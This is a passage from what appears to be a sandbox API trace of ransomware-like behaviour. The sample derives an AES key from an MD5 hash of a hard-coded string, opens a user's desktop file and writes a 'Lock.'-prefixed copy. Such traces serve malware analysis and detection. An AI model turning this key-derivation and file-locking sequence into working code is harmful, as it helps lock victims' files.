cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.217] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0090.217] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0090.217] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0090.217] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.218] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0090.218] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.218] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.218] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.218] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.218] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.218] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9c88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.218] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0090.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.218] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.219] CryptHashData (hHash=0x9a4040, pbData=0x2a71b58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0090.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.219] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.219] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9f28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.219] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a4040, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3bc0) returned 1 [0090.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ea0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.220] CryptDestroyHash (hHash=0x9a4040) returned 1 [0090.220] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/E hy.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\e hy.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0090.220] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.220] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0090.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0090.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0090.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.222] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75510 | out: hHeap=0x2af0000) returned 1 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.E hy.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.e hy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0090.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0090.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0090.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0090.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0090.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x39c7020 [0090.226] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0090.227] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x9efc, lpOverlapped=0x0) returned 1 [0090.228] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0090.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9efc) returned 0x2a7a130 [0090.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39c7020 | out: hHeap=0x2af0000) returned 1 [0090.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9efc) returned 0x2a84038 [0090.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0090.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9efc) returned 0x2a7a130 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.233] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9efc) returned 0x2a7a130 [0090.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: 